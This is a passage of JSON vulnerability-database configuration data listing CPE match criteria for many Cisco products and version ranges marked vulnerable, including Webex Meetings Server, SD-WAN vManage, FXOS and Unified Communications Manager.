:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"11.6\",\"matchCriteriaId\":\"5F46A7AC-C133-442D-984B-BA278951D0BF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:packaged_contact_center_enterprise:11.6\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A1A75AB6-C3A7-4299-B35A-46A4BCD00816\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:paging_server:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"14.4.1\",\"matchCriteriaId\":\"0A73E888-C8C2-4AFD-BA60-566D45214BCA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:prime_service_catalog:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"12.1\",\"matchCriteriaId\":\"4B0D0FD0-ABC6-465F-AB8D-FA8788B1B2DD\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:sd-wan_vmanage:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"20.3.4.1\",\"matchCriteriaId\":\"D673F6F7-C42A-4538-96F0-34CB4F0CB080\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:sd-wan_vmanage:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"20.4\",\"versionEndExcluding\":\"20.4.2.1\",\"matchCriteriaId\":\"FD374819-3CED-4260-90B6-E3C1333EAAD2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:sd-wan_vmanage:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"20.5\",\"versionEndExcluding\":\"20.5.1.1\",\"matchCriteriaId\":\"D2D89973-94AF-4BE7-8245-275F3FEB30F4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:sd-wan_vmanage:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"20.6\",\"versionEndExcluding\":\"20.6.2.1\",\"matchCriteriaId\":\"91A9A889-2C2B-4147-8108-C35291761C15\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:smart_phy:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.2.1\",\"matchCriteriaId\":\"D0EEA1EC-C63C-4C7D-BFAE-BA4556332242\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.0\\\\(1p\\\\)\",\"matchCriteriaId\":\"ACE22D97-42FA-4179-99E5-C2EE582DB7FF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_director:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"6.8.2.0\",\"matchCriteriaId\":\"F6B5DB6D-9E7D-4403-8028-D7DA7493716B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:-:*:*:*\",\"versionEndExcluding\":\"11.5\\\\(1\\\\)\",\"matchCriteriaId\":\"B98D7AD5-0590-43FB-8AC0-376C9C500C15\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:session_management:*:*:*\",\"versionEndExcluding\":\"11.5\\\\(1\\\\)\",\"matchCriteriaId\":\"D9DA1900-9972-4DFD-BE2E-74DABA1ED9A9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_communications_manager:11.5\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"42A41C41-A370-4C0E-A49D-AD42B2F3FB5C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_communications_manager:11.5\\\\(1\\\\):*:*:*:-:*:*:*\",\"matchCriteriaId\":\"7E958AFF-185D-4D55-B74B-485BEAEC42FD\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_communications_manager:11.5\\\\(1\\\\):*:*:*:session_management:*:*:*\",\"matchCriteriaId\":\"F770709C-FFB2-4A4E-A2D8-2EAA23F2E87C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_communications_manager:11.5\\\\(1\\\\)su3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B85B81F9-8837-426E-8639-AB0712CD1A96\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_communications_manager_im_and_presence_service:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"11.5\\\\(1\\\\)\",\"matchCriteriaId\":\"C1CCCD27-A247-4720-A2FE-C8ED55D1D0DE\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_communications_manager_im_and_presence_service:11.5\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"34D89C42-AAD9-4B04-9F95-F77681E39553\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_enterprise:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"11.6\\\\(2\\\\)\",\"matchCriteriaId\":\"897C8893-B0B6-4D6E-8D70-31B421D80B9A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_enterprise:11.6\\\\(2\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"91D62A73-21B5-4D16-A07A-69AED2D40CC0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_express:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"12.5\\\\(1\\\\)\",\"matchCriteriaId\":\"B0492049-D3AC-4512-A4BF-C9C26DA72CB0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_customer_voice_portal:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"11.6\",\"matchCriteriaId\":\"3868A8AA-6660-4332-AB0C-089C150D00E7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_customer_voice_portal:11.6:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"58BD72D6-4A79-49C9-9652-AB0136A591FA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_customer_voice_portal:12.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A32761FD-B435-4E51-807C-2B245857F90E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_customer_voice_portal:12.5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"154F7F71-53C5-441C-8F5C-0A82CB0DEC43\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unity_connection:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"11.5\\\\(1\\\\)\",\"matchCriteriaId\":\"65FD3873-2663-4C49-878F-7C65D4B8E455\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:video_surveillance_operations_manager:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"7.14.4\",\"matchCriteriaId\":\"0886FB04-24AA-4995-BA53-1E44F94E114E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:virtual_topology_system:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.6.7\",\"matchCriteriaId\":\"C61805C1-1F73-462C-A9CA-BB0CA4E57D0B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:virtualized_infrastructure_manager:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.2.0\",\"matchCriteriaId\":\"5EB39834-0F6D-4BD7-AFEC-DD8BEE46DA50\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:virtualized_infrastructure_manager:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"3.4.0\",\"versionEndExcluding\":\"3.4.4\",\"matchCriteriaId\":\"0B78DD21-15F2-47A4-8A99-6DB6756920AC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:virtualized_voice_browser:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"12.5\\\\(1\\\\)\",\"matchCriteriaId\":\"7C6222EB-36E1-4CD5-BD69-5A921ED5DA6A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:wan_automation_engine:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"7.3.0.2\",\"matchCriteriaId\":\"C200CABD-F91B-49C4-A262-C56370E44B4C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:webex_meetings_server:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.0\",\"matchCriteriaId\":\"DE22BE9B-374E-43DC-BA91-E3B9699A4C7C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:webex_meetings_server:3.0:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"61D1081F-87E8-4E8B-BEBD-0F239E745586\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release1:*:*:*:*:*:*\",\"matchCriteriaId\":\"8D138973-02B0-4FEC-A646-FF1278DA1EDF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release2:*:*:*:*:*:*\",\"matchCriteriaId\":\"30B55A5B-8C5E-4ECB-9C85-A8A3A3030850\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3:*:*:*:*:*:*\",\"matchCriteriaId\":\"14DBEC10-0641-441C-BE15-8F72C1762DCE\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3:-:*:*:*:*:*\",\"matchCriteriaId\":\"205C1ABA-2A4F-480F-9768-7E3EC43B03F5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_security_patch4:*:*:*:*:*:*\",\"matchCriteriaId\":\"D36FE453-C43F-448B-8A59-668DE95468C0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_security_patch5:*:*:*:*:*:*\",\"matchCriteriaId\":\"E8DF0944-365F-4149-9059-BDFD6B131DC5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_service_pack_2:*:*:*:*:*:*\",\"matchCriteriaId\":\"6B37AA08-13C7-4FD0-8402-E344A270C8F7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_service_pack_3:*:*:*:*:*:*\",\"matchCriteriaId\":\"2AA56735-5A5E-4D8C-B09D-DBDAC2B5C8E9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release4:*:*:*:*:*:*\",\"matchCriteriaId\":\"4646849B-8190-4798-833C-F367E28C1881\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:webex_meetings_server:4.0:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"4D6CF856-093A-4E89-A71D-50A2887C265B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release1:*:*:*:*:*:*\",\"matchCriteriaId\":\"B36A9043-0621-43CD-BFCD-66529F937859\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release2:*:*:*:*:*:*\",\"matchCriteriaId\":\"8842B42E-C412-4356-9F54-DFC53B683D3E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release3:*:*:*:*:*:*\",\"matchCriteriaId\":\"D25BC647-C569-46E5-AD45-7E315EBEB784\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:workload_optimization_manager:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.2.1\",\"matchCriteriaId\":\"B468EDA1-CDEF-44D4-9D62-C433CF27F631\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:cisco:unified_intelligence_center:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"12.6\\\\(1\\\\)\",\"matchCriteriaId\":\"C90C6CD1-4678-4621-866B-F0CE819C8000\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:cisco:unified_sip_proxy:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"10.2.1v2\",\"matchCriteriaId\":\"9E4905E2-2129-469C-8BBD-EDA258815E2B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:cisco:unified_workforce_optimization:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"11.5\\\\(1\\\\)\",\"matchCriteriaId\":\"EC86AC6C-7C08-4EB9-A588-A034113E4BB1\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:cisco:firepower_1010:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7FFE3880-4B85-4E23-9836-70875D5109F7\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:cisco:firepower_1120:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"727A02E8-40A1-4DFE-A3A2-91D628D3044F\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:cisco:firepower_1140:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"19F6546E-28F4-40DC-97D6-E0E023FE939B\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:cisco:firepower_1150:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"EB3B0EC3-4654-4D90-9D41-7EC2AD1DDF99\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:cisco:firepower_2110:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"52D96810-5F79-4A83-B8CA-D015790FCF72\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:cisco:firepower_2120:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"16FE2945-4975-4003-AE48-7E134E167A7F\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:cisco:firepower_2130:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"DCE7122A-5AA7-4ECD-B024-E27C9D0CFB7B\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:cisco:firepower_2140:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"976901BF-C52C-4F81-956A-711AF8A60140\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:cisco:firepower_4110:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A0CBC7F5-7767-43B6-9384-BE143FCDBD7F\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:cisco:firepower_4112:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"957D64EB-D60E-4775-B9A8-B21CA48ED3B1\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:cisco:firepower_4115:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A694AD51-9008-4AE6-8240-98B17AB527EE\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:cisco:firepower_4120:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"38AE6DC0-2B03-4D36-9856-42530312CC46\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:cisco:firepower_4125:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"71DCEF22-ED20-4330-8502-EC2DD4C9838F\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:cisco:firepower_4140:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3DB2822B-B752-4CD9-A178-934957E306B4\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:cisco:firepower_4145:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"81F4868A-6D62-479C-9C19-F9AABDBB6B24\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:cisco:firepower_4150:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"65378F3A-777C-4AE2-87FB-1E7402F9EA1B\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:cisco:firepower_9300:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"07DAFDDA-718B-4B69-A524-B0CEB80FE960\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:cisco:fxos:6.2.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"82C8AD48-0130-4C20-ADEC-697668E2293B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:cisco:fxos:6.3.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"4E75EF7C-8D71-4D70-91F0-74FC99A90CC3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:cisco:fxos:6.4.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2DB7EE7D-8CB4-4804-9F9D-F235608E86E1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:cisco:fxos:6.5.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"77571973-2A94-4E15-AC5B-155679C3C565\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:cisco:fxos:6.6.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"CA405A50-3F31-48ED-9AF1-4B02F5B367DE\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:cisco:fxos:6.7.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D3753953-04E8-4382-A6EC-CD334DD83CF4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:cisco:fxos:7.0.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B4A5F89F-1296-4A0F-A36D-082A481F190F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:cisco:fxos:7.1.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F50F48AF-44FF-425C-9685-E386F956C901\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:automated_subsea_tuning:02.01.00:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A4D28E76-56D4-4C9A-A660-7CD7E0A1AC9F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:broadworks:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"CD975A0E-00A6-475E-9064-1D64E4291499\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:cloudcenter_suite:4.10\\\\(0.15\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2E50AC21-DA54-4BC8-A503-1935FD1714C7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:cloudcenter_suite:5.3\\\\(0\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"4D05E169-4AF1-4127-A917-056EC2CE781B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:cloudcenter_suite:5.4\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"8AD415A2-422E-4F15-A177-C3696FEAFF0C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:cloudcenter_suite:5.5\\\\(0\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"134443B7-7BA8-4B50-8874-D4BF931BECFD\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:cloudcenter_suite:5.5\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"73ADF6EA-CD29-4835-8D72-84241D513AFF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:common_services_platform_collector:002.009\\\\(000.000\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"BAC1A386-04C7-45B2-A883-1CD9AB60C14B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:common_services_platform_collector:002.009\\\\(000.001\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3F0F1639-D69E-473A-8926-827CCF73ACC9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:common_services_platform_collector:002.009\\\\(000.002\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F4FDF900-E9D6-454A-BF6B-821620CA59F4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:common_services_platform_collector:002.009\\\\(001.000\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1859BD43-BA2B-45A5-B523-C6BFD34C7B01\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:common_services_platform_collector:002.009\\\\(001.001\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1EBC145C-9A2F-4B76-953E-0F690314511C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:common_services_platform_collector:002.009\\\\(001.002\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"158B7A53-FEC1-4B42-A1E2-E83E99564B07\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:common_services_platform_collector:002.010\\\\(000.000\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3A378971-1A08-4914-B012-8E24DCDEFC68\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.004.000.003:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"4E5CC012-DC85-481A-B82A-9323C19674DA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.005.000.:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"76CF59ED-685D-46CD-80A2-AEDA4F03FE53\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.005.000.000:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"960B07C0-E205-47E7-B578-46A0AF559D04\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.000.001:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A1A194E1-405E-47FA-8CDF-58EB78883ACC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.001.000:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2E628231-61FB-40AF-A20B-00F5CB78E63B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.002.000:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2EA25E92-2C76-4722-BA06-53F33C0D961C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:connected_analytics_for_network_deployment:7.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"51D2940A-0D03-415B-B72E-1F6862DDAC41\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.000:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"8B346ADC-00BE-4409-B658-A11351D2A7D4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.001.001:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5A0E44A9-C427-493B-868A-8A8DA405E759\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.003:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B2B31E7C-0EB3-4996-8859-DF94A3EE20B3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:connected_analytics_for_network_deployment:008.000.000:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3EAB3E03-275F-4942-9396-FC7A22F42C8D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:connected_analytics_for_network_deployment:008.000.000.000.004:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"19DAD751-D170-4914-BAB2-6054DFEEF404\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:crosswork_network_automation:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2F429F37-3576-4D8A-9901-359D65EC3CF4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:crosswork_network_automation:2.0.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F526DEF1-4A3E-4FE1-8153-E9252DAE5B92\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:crosswork_network_automation:3.0.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"C19679D0-F4DC-4130-AFFD-692E5130531A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:crosswork_network_automation:4.1.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"60D2FBF3-D8AB-41F0-B170-9E56FBF7E2F7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:crosswork_network_automation:4.1.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F60324DD-8450-4B14-A7A1-0D5EA5163580\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:cx_cloud_agent:001.012:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"12F6DFD1-273B-4292-A22C-F2BE0DD3FB3F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:cyber_vision:4.0.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"13EA024C-97A4-4D33-BC3E-51DB77C51E76\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:cyber_vision_sensor_management_extension:4.0.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"85289E35-C7C2-46D0-9BDC-10648DD2C86F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:dna_center:2.2.2.8:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"17282822-C082-4FBC-B46D-468DCF8EF6B8\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:dna_spaces:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F5463DA6-5D44-4C32-B46C-E8A2ADD7646B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:dna_spaces_connector:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"54A237CF-A439-4114-AF81-D75582F29573\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:emergency_responder:11.5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A37D19BF-E4F5-4AF4-8942-0C3B62C4BF2B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:emergency_responder:11.5\\\\(4.65000.14\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"EF25688B-6659-4C7C-866D-79AA1166AD7A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:emergency_responder:11.5\\\\(4.66000.14\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"47B70741-90D9-4676-BF16-8A21E147F532\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:enterprise_chat_and_email:12.0\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"ED862A1B-E558-4D44-839C-270488E735BB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:enterprise_chat_and_email:12.5\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2678AF98-1194-4810-9933-5BA50E409F88\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:enterprise_chat_and_email:12.6\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"37E7DEBD-9E47-4D08-86BC-D1B013450A98\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:evolved_programmable_network_manager:3.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1A935862-18F7-45FE-B647-1A9BA454E304\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:evolved_programmable_network_manager:3.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"69594997-2568-4C10-A411-69A50BFD175F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:evolved_programmable_network_manager:4.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1EC39E2D-C47B-4311-BC7B-130D432549F4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:evolved_programmable_network_manager:4.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"EE5E6CBE-D82C-4001-87CB-73DF526F0AB1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:evolved_programmable_network_manager:5.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"460E6456-0E51-45BC-868E-DEEA5E3CD366\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:evolved_programmable_network_manager:5.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F7F58659-A318-42A0-83C5-8F09FCD78982\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:finesse:12.5\\\\(1\\\\):su1:*:*:*:*:*:*\",\"matchCriteriaId\":\"D8A49E46-8501-4697-A17A-249A7D9F5A0B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:finesse:12.5\\\\(1\\\\):su2:*:*:*:*:*:*\",\"matchCriteriaId\":\"5D81E7A9-0C2B-4603-91F0-ABF2380DBBA3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:finesse:12.6\\\\(1\\\